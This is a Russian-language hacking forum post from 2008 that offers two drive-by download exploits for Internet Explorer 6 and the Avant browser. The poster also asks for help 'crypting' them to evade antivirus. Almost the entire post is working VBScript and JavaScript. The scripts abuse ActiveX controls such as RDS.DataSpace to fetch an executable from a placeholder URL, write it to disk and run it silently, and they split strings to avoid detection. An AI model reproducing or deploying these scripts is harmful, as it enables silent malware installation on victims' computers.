|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458
Репутация:
243
|
|
пара эксплоитов для для ие 6, последний билд авант браузера тож пробивает. позволяет скачать и запустить файл  хз выкладывалось или нет, кто сможет криптануть мне в личку напишите
Код:
<SCRIPT language="VBScript">
Module_Path="http://путь до файла.exe"
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Const ssfFONTS=20
Const adModeReadWrite=3
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim oRDS
Dim oXMLHTTP
Dim oFSO
Dim oStream
Dim oWShell
Dim oShellApp
Dim WinDir
Dim ExeName
Dim XMLBody
Dim PluginFile
Dim cByte
Dim ObjName
Dim ObjProg
Randomize
ExeName=GenerateName()
ExeName=ExeName & ".exe"
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
Set oRDS=document.createElement("object")
oRDS.setAttribute "id","oRDS"
oRDS.setAttribute "classid",clsfull
Set oShellApp = oRDS.CreateObject("Shell.Application","")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName
ObjName="Microsoft"
ObjProg="XMLHTTP"
set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
oXMLHTTP.Send()
On Error Resume Next
XMLBody=oXMLHTTP.responseBody
ObjName="ADODB"
ObjProg="Stream"
On Error Resume Next
Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
If Err.number <> 0 Then
Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
Plugin_size=LenB(XMLBody)
For j=1 To Plugin_size
cByte=MidB(XMLBody,j,1)
ByteCode=AscB(cByte)
PluginFile.Write(Chr(ByteCode))
Next
PluginFile.Close
Set oWShell=oRDS.CreateObject("WScript.Shell","")
On Error Resume Next
oWShell.Run (ExeName),1,FALSE
Else
oStream.Mode=adModeReadWrite
oStream.Type=adTypeBinary
oStream.Open
oStream.Write XMLBody
oStream.SaveToFile ExeName,adSaveCreateOverWrite
oShellApp.ShellExecute ExeName
End If
End If
End If
Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
ii=Int(25*Rnd)+97
RandomName=RandomName+Chr(ii)
ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function
</SCRIPT>
Код:
<SCRIPT language="javascript">
var bb949531092ff = "http://путь до файла";
function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
}
function Go(a) {
var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
var o = CreateO(a, "ADO"+"DB.Str"+"eam");
var e = s.Environment("Process");
var bb351865611ff = null;
var bin = e.Item("TEMP")+ "\\" + "fdklkjTUFOYUT.exe";
var bb532058559ff;
try { bb351865611ff=new XMLHttpRequest(); }
catch(e) {
try { bb351865611ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
catch(e) {
bb351865611ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
}
}
if (! bb351865611ff) return(0);
bb351865611ff.open("GET", bb949531092ff, false)
bb351865611ff.send(null);
bb532058559ff = bb351865611ff.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(bb532058559ff);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
var i = 0;
var bb804375678ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
while (bb804375678ff[i]) {
var a = null;
if (bb804375678ff[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + bb804375678ff[i].substring(1, bb804375678ff[i].length - 1));
} else {
try { a = new ActiveXObject(bb804375678ff[i]); } catch(e){}
}
if (a) {
try {
var b = CreateO(a, "WSc"+"ript.She"+"ll");
if (b) {
Go(a);
//return(0);
}
} catch(e){}
}
i++;
}
</script>
Последний раз редактировалось Витян; 15.01.2008 в 01:15..
|